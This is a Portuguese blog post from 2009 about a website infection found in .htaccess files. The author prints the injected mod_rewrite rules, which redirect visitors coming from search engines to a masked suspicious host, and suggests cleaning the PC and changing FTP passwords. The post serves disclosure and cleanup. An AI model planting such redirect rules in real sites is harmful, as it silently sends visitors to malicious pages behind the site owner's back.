Página Inicial > Internet > Virus em ficheiros .htaccess

Virus em ficheiros .htaccess

1, Abril, 2009
Ver comentários Escrever um comentário

Com algum espanto hoje verifiquei que um site que fiz tinha virus, corri e percorri o codigo todo sem encontrar nada em concreto, até que ao fim de umas horas decidi começar a verificar ficheiro por ficheiro em cada pasta incluindo o .htaccess onde verifiquei que tinha ficheiros .htaccess com o texto que segue mais abaixo.

Virus utiliza o mod_rewrite infectando htaccess

É claro que eu ao visitar o site nunca iria ver o virus, pois o .htaccess faz uso do mod_rewrite do apache para redireccionar os visitantes que chegam ao nosso site a partir dos motores de busca para sites “suspeitos”.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://xxxxxx-xxxxxxx.xxxx [R,L]

A remoção do virus é basntante simples e passa tambem pelo que já expliquei no virus iframe como lhe chamei, passa pela limpeza do computador que no meu caso está “limpo” julgo eu :-) e pela alteração de passwords ftp.

Posts Relacionados:

NarG Internet

  1. Josias
    10, Abril, 2009 a 22:30 | #1
    Resposta | Citação

    Cara isso aconteceu comigo e que dor de cabeça… vou seguir as dicas e malditos iframes…

  1. Ainda sem nenhum trackback.
-->

Meta

-->